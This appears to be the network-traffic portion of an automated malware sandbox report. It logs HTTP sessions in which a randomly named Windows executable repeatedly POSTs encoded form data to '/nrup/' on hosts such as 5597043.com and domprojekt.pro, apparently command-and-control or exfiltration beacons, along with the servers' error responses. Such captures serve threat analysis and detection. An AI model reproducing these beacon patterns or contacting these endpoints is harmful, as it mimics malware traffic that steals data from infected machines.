May 3, 2024 11:34:59.733637094 CEST	299	IN	HTTP/1.1 405 Not Allowed date: Fri, 03 May 2024 09:34:59 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.22	49199	91.195.240.94	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:04.226489067 CEST	730	OUT	POST /nrup/ HTTP/1.1 Host: www.5597043.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.5597043.com Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.5597043.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 37 59 46 56 66 41 45 39 67 39 76 44 70 58 38 35 51 5a 31 58 42 72 4b 6d 4b 44 72 72 58 30 2f 56 52 42 44 34 32 78 6e 75 4d 4c 36 5a 4d 53 47 6b 6e 43 62 56 65 4f 54 4d 4e 4b 53 34 55 78 53 65 47 48 50 45 6c 63 43 75 77 72 79 34 38 70 30 42 30 4e 68 36 6a 53 64 5a 51 73 78 44 2b 4f 36 44 48 4f 55 52 71 64 30 64 4f 6f 51 35 4a 64 32 71 48 78 58 66 59 69 59 35 77 74 43 7a 32 69 48 62 70 58 6a 79 33 63 6a 78 54 42 74 7a 6e 62 61 61 41 57 58 50 71 74 42 57 63 70 57 35 34 30 4c 58 72 39 78 44 54 2f 30 72 67 72 79 6a 76 7a 50 36 39 36 56 69 36 5a 4f 30 42 47 46 64 2b 50 4b 54 6f 51 3d 3d Data Ascii: pX6dR=7YFVfAE9g9vDpX85QZ1XBrKmKDrrX0/VRBD42xnuML6ZMSGknCbVeOTMNKS4UxSeGHPElcCuwry48p0B0Nh6jSdZQsxD+O6DHOURqd0dOoQ5Jd2qHxXfYiY5wtCz2iHbpXjy3cjxTBtznbaaAWXPqtBWcpW540LXr9xDT/0rgryjvzP696Vi6ZO0BGFd+PKToQ==
May 3, 2024 11:35:04.406793118 CEST	299	IN	HTTP/1.1 405 Not Allowed date: Fri, 03 May 2024 09:35:04 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.22	49200	91.195.240.94	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:06.928121090 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.5597043.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.5597043.com Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.5597043.com/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 37 59 46 56 66 41 45 39 67 39 76 44 6f 32 4d 35 56 34 31 58 56 37 4b 6c 57 7a 72 72 46 30 2f 52 52 42 50 34 32 77 69 7a 4d 35 32 5a 4d 42 2b 6b 6d 67 44 56 59 4f 54 4d 4c 4b 53 38 4d 52 53 49 47 48 72 6d 6c 5a 2f 62 77 75 69 34 36 36 67 42 39 6f 4e 39 73 79 64 58 62 4d 78 45 2b 4f 37 62 48 4e 38 56 71 64 78 77 4f 6f 49 35 4a 75 4f 71 57 52 58 59 64 69 59 35 77 74 43 46 32 69 48 6e 70 58 36 33 33 64 36 71 54 77 64 7a 6d 36 36 61 44 33 58 49 73 74 42 53 57 4a 58 56 78 57 65 4f 76 50 42 74 58 74 30 32 71 5a 47 44 79 51 66 2b 6b 6f 68 43 73 49 57 6e 49 44 6b 78 39 4c 58 55 73 49 53 2f 75 32 66 56 53 77 79 56 45 59 49 4c 57 66 69 56 6c 59 67 6b 6b 6b 58 44 6b 64 72 42 57 71 73 38 6c 31 44 64 78 6d 79 66 42 58 49 4d 6c 4c 62 4b 30 4f 50 72 6c 4d 77 46 66 45 2f 56 47 48 57 49 75 72 75 36 2f 44 7a 4d 48 68 6a 2b 48 32 74 48 6a 39 70 69 58 76 69 45 44 77 61 6b 68 53 4c 41 65 73 6b 57 31 2b 6d 63 72 79 70 71 52 51 62 6d 7a 68 62 6d 4b 74 56 67 54 42 68 68 74 56 34 38 6c 36 61 79 32 64 69 44 [TRUNCATED] Data Ascii: pX6dR=7YFVfAE9g9vDo2M5V41XV7KlWzrrF0/RRBP42wizM52ZMB+kmgDVYOTMLKS8MRSIGHrmlZ/bwui466gB9oN9sydXbMxE+O7bHN8VqdxwOoI5JuOqWRXYdiY5wtCF2iHnpX633d6qTwdzm66aD3XIstBSWJXVxWeOvPBtXt02qZGDyQf+kohCsIWnIDkx9LXUsIS/u2fVSwyVEYILWfiVlYgkkkXDkdrBWqs8l1DdxmyfBXIMlLbK0OPrlMwFfE/VGHWIuru6/DzMHhj+H2tHj9piXviEDwakhSLAeskW1+mcrypqRQbmzhbmKtVgTBhhtV48l6ay2diDLDa/p6ZELPn6GnMJLzKjo9aROBxgrtNlv1HV72bG3PElePRPWA+A9wUBGgZwa3tpHQuwCdA3oqOQwl4TgDdMd1+ZQFTI8M9N0CEI98sEYco/JfAucwyYXqGvHEYUELE5fRaOTRqC3BnLi6ivLLWOs2HK4stdDeVmNmREw5Gd6/zrI0ei+imoyfmDZdRAdgu7iLuc8Ef+QRelMQe3Q6CDpQcNy4MeYqICs/4Xb1rYn+4pBhjpBERgeRcAtSQwS+NirtTMlScMEEH0iJ3CK91Fhn4255Un8tyulzt8qJx2hmksmcsZkHumpw6xVbkHQdRfQH0dcgk6W88/ZbVRWBeCYBmPuHiG81GbaKRH/jJpXRrO46/w0+KmsI3pTNSoxLgAuqqQlEOQxncIVVqxGvQ2UE5gAbmgtP+YVFL0UzWOrqsXq5Yv16OtlNNPP40Yav2bvFKkX7f62yk255eJDA/kUDKee4+1p3QdcO4QpoKtXqxXjAVBro6HNbTrzMx4n0n5/kEwTJqkgj+PUkLj9dTsrL9LNq4vNjZ+dv2mcEiRC825TZKK4DftCOtyRHv3S8nGma3myWMl4ONd6J2ZjM/PO7MCBAzsBZRl3rJ0rcaAoN7U/H93tyiZl+LjwZmeuesKzKVG/RqET3DW8hCThO9rs0DXrHfMbeEjJD [TRUNCATED]
May 3, 2024 11:35:07.103255033 CEST	1577	OUT	Data Raw: 6c 47 5a 4f 6d 61 6f 79 57 4f 44 6d 4a 74 6a 72 6f 73 6d 2b 39 6d 31 39 56 70 49 6d 49 38 4b 55 66 74 57 35 4c 65 39 4d 34 6a 4c 62 34 78 77 57 36 4a 4d 65 77 4c 59 30 58 6c 53 71 79 6e 46 38 62 6b 64 2b 41 53 73 33 70 63 35 46 4e 59 79 64 77 57 Data Ascii: lGZOmaoyWODmJtjrosm+9m19VpImI8KUftW5Le9M4jLb4xwW6JMewLY0XlSqynF8bkd+ASs3pc5FNYydwWuPd33LRGgUJVKHIorQChj6tSPe7HVx/0yYh3JR8kv7iw8n5gTciAP1VB3BAiSlktMcXs3FqfQy8kZBBAT0e+fs8mxyPgTjRhNiiyrKuNV860R/5OZQfwaq2ZKVq+J5OSQrWBwonSeczK2dQe7nlZZo+ohDHm02ikh
May 3, 2024 11:35:07.105009079 CEST	299	IN	HTTP/1.1 405 Not Allowed date: Fri, 03 May 2024 09:35:07 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.22	49201	91.195.240.94	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:09.627954006 CEST	470	OUT	GET /nrup/?pX6dR=2at1c1MHk4LdsVUDX6VNCfiZAhfBXFznTyG93G2uP4ilKgyCyFz2SOnlOoLDNVe+GAWkq5GLoOyug5V+2NERvjVgTNNC5euwUf40sv0MPI9wPMaUWVPIc3sG3prc&tv=6TdD8B HTTP/1.1 Host: www.5597043.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:35:09.804210901 CEST	107	IN	HTTP/1.1 439 date: Fri, 03 May 2024 09:35:09 GMT content-length: 0 server: NginX connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.22	49202	46.242.239.47	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:15.138391018 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.domprojekt.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.domprojekt.pro Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.domprojekt.pro/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 52 51 63 4b 75 6c 59 75 56 50 46 77 47 4d 41 32 59 52 48 69 43 6e 4a 55 53 38 4d 2f 6c 35 63 44 4d 6b 54 61 69 46 34 6d 5a 30 76 78 76 56 58 39 49 54 6f 2f 62 64 65 69 39 44 6a 38 46 49 4d 72 7a 78 56 73 57 4f 30 64 68 62 7a 33 62 66 79 4e 4a 78 64 6d 33 4a 6f 76 78 31 32 32 6f 4a 69 48 57 5a 46 46 44 45 5a 76 4c 6e 73 54 79 35 51 52 61 6e 78 72 57 61 6f 32 55 47 5a 75 42 4c 32 69 65 36 6f 68 31 4b 54 41 44 63 47 52 38 37 50 74 68 39 38 68 38 71 2b 77 62 59 48 58 38 35 53 55 6c 34 65 51 66 56 4e 2f 74 48 2b 62 36 54 4b 66 49 61 57 46 51 39 6a 6c 71 4d 67 59 67 4a 54 71 49 31 6e 45 62 41 59 7a 69 6c 4d 73 43 66 49 31 38 38 72 4f 2f 4d 4e 65 52 48 59 44 55 54 6a 74 6b 49 2b 54 32 42 2f 6d 69 54 4a 50 78 73 33 73 31 69 39 46 55 42 59 6c 69 41 4f 6a 49 66 66 48 50 48 70 6d 70 35 6d 55 69 6b 35 32 44 41 64 6d 50 48 50 6f 56 49 38 36 59 74 6e 42 52 54 42 4c 38 34 6f 71 74 62 33 2b 76 34 46 52 2f 72 75 76 6d 39 52 52 7a 62 4e 41 67 34 79 50 54 68 46 58 32 63 39 37 6e 67 4f 58 48 4d 72 62 [TRUNCATED] Data Ascii: pX6dR=RQcKulYuVPFwGMA2YRHiCnJUS8M/l5cDMkTaiF4mZ0vxvVX9ITo/bdei9Dj8FIMrzxVsWO0dhbz3bfyNJxdm3Jovx122oJiHWZFFDEZvLnsTy5QRanxrWao2UGZuBL2ie6oh1KTADcGR87Pth98h8q+wbYHX85SUl4eQfVN/tH+b6TKfIaWFQ9jlqMgYgJTqI1nEbAYzilMsCfI188rO/MNeRHYDUTjtkI+T2B/miTJPxs3s1i9FUBYliAOjIffHPHpmp5mUik52DAdmPHPoVI86YtnBRTBL84oqtb3+v4FR/ruvm9RRzbNAg4yPThFX2c97ngOXHMrb3M/ws5iaBEjqHb0Bl4B/jdngH2IVy6yjs49y/FLgVPCkt8AiDMEJrAasdAPLFTpiZ49mrC8A6mvuVpAvqDOBpJbtmkARka+VYi1Bjo5c3cNcMObpeqh/5ARKpCs2q0DJxPBKPj179txwAKBufKXrdZhXsBbLGSfuwVg/llO5dsDHipngihJLyINJanHoNykKX/2+ivFmvfEWgyx92FCMbFesxuA1AfdHjplniapVUM1Z2POuW/Y8cCbbOIZajYNDg40OAH76k624RVGOJP+DdKKDqPTNxkLv3sDw7eEcw9RJtlqiXb64U3o0/bwMFoioKWl+l1gvPXoLdo4Fj/XL3mwqEB2ZLE4081Uvc+Oceq+PHiHjA2FElVO0U4c3+0p0uw5E7SOD16LoFC+jTUu3lxevRQgPKrnVS924Gjrjfu4bTD5vki8PvQT12wh0zNrwByieWFBAuCXm6B9wbZPFZp17/wHvuHll4Wz5jX7YZNjJ5tIIIqM7X9X6CjjXrFlx+dEbeAA3uigHMJBsyWgFFn3a9h/02X36d28IRmAVP1YWbqsKv8CINB5hXaezedeDu33hsoTaIMuuiNYPmuRpFvY/chPvN+6WI8XCPg2g1C5PEmoR5kZHDUUqHUNKyWnoTeJWdRLlSeTWSJiGB4Lt72oIYQQ5RSAMVG [TRUNCATED]
May 3, 2024 11:35:15.326721907 CEST	122	OUT	Data Raw: 62 37 64 30 6d 44 39 62 4f 6b 36 56 6b 50 52 37 6c 70 76 7a 63 5a 4c 35 51 32 55 59 55 2f 4e 6f 47 41 59 74 68 59 62 2b 4c 30 54 37 79 4e 4d 4e 67 56 61 74 62 61 70 50 37 4f 59 39 49 72 6b 77 49 46 63 2b 61 67 69 59 79 6e 31 68 67 35 45 63 61 51 Data Ascii: b7d0mD9bOk6VkPR7lpvzcZL5Q2UYU/NoGAYthYb+L0T7yNMNgVatbapP7OY9IrkwIFc+agiYyn1hg5EcaQvYt1dIhrxFdkkU7YXLEGPcad9iZL7+VLP+FD4Iqd
May 3, 2024 11:35:15.557394028 CEST	213	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:35:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: Apache Content-Encoding: gzip Data Raw: 32 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 51 74 f1 77 0e 89 0c 70 55 c8 28 c9 cd b1 e3 02 00 00 00 ff ff 0d 0a Data Ascii: 20QtwpU(
May 3, 2024 11:35:15.557413101 CEST	12	IN	Data Raw: 37 0d 0a e2 02 00 00 00 ff ff 0d 0a Data Ascii: 7
May 3, 2024 11:35:15.557447910 CEST	24	IN	Data Raw: 37 0d 0a e2 02 00 00 00 ff ff 0d 0a 37 0d 0a e2 02 00 00 00 ff ff 0d 0a Data Ascii: 77
May 3, 2024 11:35:15.557507038 CEST	148	IN	Data Raw: 38 65 0d 0a 54 8c c1 0e 82 30 10 44 ef 7c 45 d3 b3 3d 78 f3 c0 92 18 e3 c1 0f 30 f1 ba b6 23 dd a4 2d 08 0b fc be 60 62 82 b7 37 99 79 53 d5 1b 9a c4 a5 25 8b 62 9b ca 98 3a 82 c3 06 2b 66 28 1b 1f 79 18 a1 64 27 7d b9 93 dd 57 51 b5 77 78 4f 32 Data Ascii: 8eT0D\|E=x0#-`b7yS%b:+f(yd'}WQwxO2}]3EYZ3)`#ET8sG*\|
May 3, 2024 11:35:15.557549000 CEST	173	IN	Data Raw: 37 63 0d 0a 64 90 b1 0e c2 30 0c 44 67 f8 8a 28 3b b8 48 1d 53 36 3e 24 4d 8c 12 61 5a 64 5b d0 fe 3d 0e 19 99 4e 77 96 7c a7 77 63 5e d9 8d c3 18 a0 07 c7 43 a0 ba 3c 5c 61 bc 4f 1e 72 d4 08 8a cf 17 45 45 81 0f ce 20 6a 1b 93 c9 4e 78 4e 22 de Data Ascii: 7cd0Dg(;HS6>$MaZd[=Nw\|wc^C<\aOrEE jNxN"1^vIyIo(yjc]};+n(25rtQpjhgTSnqIQ~^:D/
May 3, 2024 11:35:15.557610989 CEST	54	IN	Data Raw: 64 0d 0a 02 7b 8c a0 16 88 5a 00 00 00 00 ff ff 0d 0a 31 65 0d 0a f2 f3 0f 51 70 f3 0f f5 73 41 d6 01 a3 30 f4 a5 a4 16 27 a3 7a 02 14 aa 00 00 00 00 ff ff 0d 0a Data Ascii: d{Z1eQpsA0'z
May 3, 2024 11:35:15.557665110 CEST	86	IN	Data Raw: 31 37 0d 0a b2 29 b0 0b c9 48 05 06 48 61 69 6a 71 89 82 4d 92 1d 00 00 00 ff ff 0d 0a 33 33 0d 0a d2 cf 2b 2a 2d d0 b7 d1 4f b2 53 28 4f 2c 56 c8 cb 2f 51 48 cb 2f cd 4b 51 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 b3 d1 2f b0 e3 02 00 00 00 Data Ascii: 17)HHaijqM33+-OS(O,V/QH/KQS(,V(N-K-/
May 3, 2024 11:35:15.557764053 CEST	43	IN	Data Raw: 31 31 0d 0a 82 5a a7 00 a4 a1 c1 a6 0f 49 6d 00 00 00 00 ff ff 0d 0a 61 0d 0a 03 00 25 9d 3a 46 7e 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 11ZIma%:F~0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.22	49203	46.242.239.47	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:20.478938103 CEST	739	OUT	POST /nrup/ HTTP/1.1 Host: www.domprojekt.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.domprojekt.pro Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.domprojekt.pro/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 52 51 63 4b 75 6c 59 75 56 50 46 77 47 50 6f 32 58 6c 72 69 43 48 4a 55 56 38 4d 2f 76 5a 63 42 4d 6b 66 6b 69 45 39 39 5a 43 76 78 76 46 6e 39 49 68 41 2f 49 74 65 74 6c 54 6a 34 49 6f 4e 78 7a 78 56 42 57 50 49 64 68 61 54 33 55 64 36 4e 50 77 64 6c 31 35 6f 74 38 56 32 31 6f 4a 76 37 57 5a 49 49 44 46 42 76 4c 6c 34 54 31 35 41 52 52 68 74 72 51 71 6f 4b 64 6d 59 32 42 4f 75 33 65 36 34 35 31 4b 76 41 41 74 61 52 39 71 76 74 72 4f 55 68 31 4b 2b 6b 44 49 47 68 30 38 76 63 69 4c 66 64 62 30 31 4f 71 43 61 62 35 54 75 4a 45 35 47 4b 59 59 6e 5a 7a 63 42 73 75 35 79 52 64 41 3d 3d Data Ascii: pX6dR=RQcKulYuVPFwGPo2XlriCHJUV8M/vZcBMkfkiE99ZCvxvFn9IhA/ItetlTj4IoNxzxVBWPIdhaT3Ud6NPwdl15ot8V21oJv7WZIIDFBvLl4T15ARRhtrQqoKdmY2BOu3e6451KvAAtaR9qvtrOUh1K+kDIGh08vciLfdb01OqCab5TuJE5GKYYnZzcBsu5yRdA==
May 3, 2024 11:35:20.688565969 CEST	213	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:35:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: Apache Content-Encoding: gzip Data Raw: 32 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 51 74 f1 77 0e 89 0c 70 55 c8 28 c9 cd b1 e3 02 00 00 00 ff ff 0d 0a Data Ascii: 20QtwpU(
May 3, 2024 11:35:20.688607931 CEST	12	IN	Data Raw: 37 0d 0a e2 02 00 00 00 ff ff 0d 0a Data Ascii: 7
May 3, 2024 11:35:20.688642025 CEST	24	IN	Data Raw: 37 0d 0a e2 02 00 00 00 ff ff 0d 0a 37 0d 0a e2 02 00 00 00 ff ff 0d 0a Data Ascii: 77
May 3, 2024 11:35:20.688745975 CEST	148	IN	Data Raw: 38 65 0d 0a 54 8c c1 0e 82 30 10 44 ef 7c 45 d3 b3 3d 78 f3 c0 92 18 e3 c1 0f 30 f1 ba b6 23 dd a4 2d 08 0b fc be 60 62 82 b7 37 99 79 53 d5 1b 9a c4 a5 25 8b 62 9b ca 98 3a 82 c3 06 2b 66 28 1b 1f 79 18 a1 64 27 7d b9 93 dd 57 51 b5 77 78 4f 32 Data Ascii: 8eT0D\|E=x0#-`b7yS%b:+f(yd'}WQwxO2}]3EYZ3)`#ET8sG*\|
May 3, 2024 11:35:20.688782930 CEST	173	IN	Data Raw: 37 63 0d 0a 64 90 b1 0e c2 30 0c 44 67 f8 8a 28 3b b8 48 1d 53 36 3e 24 4d 8c 12 61 5a 64 5b d0 fe 3d 0e 19 99 4e 77 96 7c a7 77 63 5e d9 8d c3 18 a0 07 c7 43 a0 ba 3c 5c 61 bc 4f 1e 72 d4 08 8a cf 17 45 45 81 0f ce 20 6a 1b 93 c9 4e 78 4e 22 de Data Ascii: 7cd0Dg(;HS6>$MaZd[=Nw\|wc^C<\aOrEE jNxN"1^vIyIo(yjc]};+n(25rtQpjhgTSnqIQ~^:D/
May 3, 2024 11:35:20.688857079 CEST	18	IN	Data Raw: 64 0d 0a 02 7b 8c a0 16 88 5a 00 00 00 00 ff ff 0d 0a Data Ascii: d{Z
May 3, 2024 11:35:20.688905001 CEST	36	IN	Data Raw: 31 65 0d 0a f2 f3 0f 51 70 f3 0f f5 73 41 d6 01 a3 30 f4 a5 a4 16 27 a3 7a 02 14 aa 00 00 00 00 ff ff 0d 0a Data Ascii: 1eQpsA0'z
May 3, 2024 11:35:20.688967943 CEST	129	IN	Data Raw: 31 37 0d 0a b2 29 b0 0b c9 48 05 06 48 61 69 6a 71 89 82 4d 92 1d 00 00 00 ff ff 0d 0a 33 33 0d 0a d2 cf 2b 2a 2d d0 b7 d1 4f b2 53 28 4f 2c 56 c8 cb 2f 51 48 cb 2f cd 4b 51 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 b3 d1 2f b0 e3 02 00 00 00 Data Ascii: 17)HHaijqM33+-OS(O,V/QH/KQS(,V(N-K-/11ZIma%:F~0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.22	49204	46.242.239.47	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:35:23.194020033 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.domprojekt.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.domprojekt.pro Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.domprojekt.pro/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 52 51 63 4b 75 6c 59 75 56 50 46 77 55 2b 59 32 55 45 72 69 44 6e 4a 58 61 63 4d 2f 6c 35 63 46 4d 6b 54 6b 69 46 34 6d 5a 32 4c 78 76 58 66 39 49 44 6f 2f 59 64 65 74 6a 54 6a 38 46 49 4d 71 7a 78 42 38 57 4f 34 72 68 65 33 33 62 65 79 4e 4a 32 4a 6d 2b 70 6f 76 34 56 32 30 6f 4a 76 55 57 5a 59 4d 44 46 31 4a 4c 6c 67 54 79 4b 6f 52 58 52 74 6f 63 4b 6f 4b 64 6d 59 79 42 4f 75 66 65 36 67 78 31 4c 32 4e 44 62 32 52 38 4c 50 74 70 74 38 6d 7a 4b 2b 6f 4e 6f 48 46 38 35 57 44 6c 34 65 63 66 56 70 5a 74 41 32 62 38 41 53 66 49 62 57 4b 4d 64 6a 69 30 4d 67 59 74 70 54 6b 49 31 6e 54 62 41 59 7a 69 68 4d 73 4e 76 49 31 38 2b 50 42 69 63 4e 65 62 6e 59 45 4d 7a 2f 54 6b 49 72 79 32 41 4f 52 6a 69 4e 50 79 75 76 73 77 53 39 46 59 68 59 6a 69 41 4f 6b 42 2f 66 39 50 48 67 54 70 35 32 45 69 6b 35 32 44 43 6c 6d 65 46 6e 6f 56 59 38 36 55 4e 6e 41 66 7a 42 4b 38 34 6c 50 74 62 7a 2b 76 36 31 52 2b 5a 32 76 32 49 39 53 38 4c 4e 42 6b 34 79 52 58 68 46 43 32 63 77 51 6e 67 47 39 48 4d 37 62 [TRUNCATED] Data Ascii: pX6dR=RQcKulYuVPFwU+Y2UEriDnJXacM/l5cFMkTkiF4mZ2LxvXf9IDo/YdetjTj8FIMqzxB8WO4rhe33beyNJ2Jm+pov4V20oJvUWZYMDF1JLlgTyKoRXRtocKoKdmYyBOufe6gx1L2NDb2R8LPtpt8mzK+oNoHF85WDl4ecfVpZtA2b8ASfIbWKMdji0MgYtpTkI1nTbAYzihMsNvI18+PBicNebnYEMz/TkIry2AORjiNPyuvswS9FYhYjiAOkB/f9PHgTp52Eik52DClmeFnoVY86UNnAfzBK84lPtbz+v61R+Z2v2I9S8LNBk4yRXhFC2cwQngG9HM7b3OXw/cOaB0jrfL0Fh4dzjcexH2Ery7ejttRy4HTjJvDO/sAoHMFyrAfPdEbLFBJiY71m8T8Px2uHCZA4ljOrpKn1mgk7krOVKi1BnLBTrcNVEubzF6hX5AR/pHYmqGTJxMJKBQN79txxHKBgEaa+dZdTsAjlGXTu3Fw/lkO5JcDHlpn73xJ3yLx/ai6fOCAKXdu+gttm/PEIiyxt5lDubBysxvkfAcdHjIlnj+FVbs1d7vPsW/ZPcCvfOIpKjaZDg8YOLjv6pa27TVGCNP/9dKzeqO/nxhvv2Mjw5rocqdRLlFqiY779U3gk/aMDFpaoLkd+iVgsIXoIfo4En/Xj3mAqEBqZLAE08GsvLvOcBK+NZiH1JWIjlW3LU41y+0J0o1NEtAmA6qLuPi+tEkublxezRR4fKYjVTsW4BH/gcO4AIT435y8rvRjT2y8vw8nwByyeV25AuyXm6B9zbZPZZppF/x3BuHll5DL5ikTYStjI7t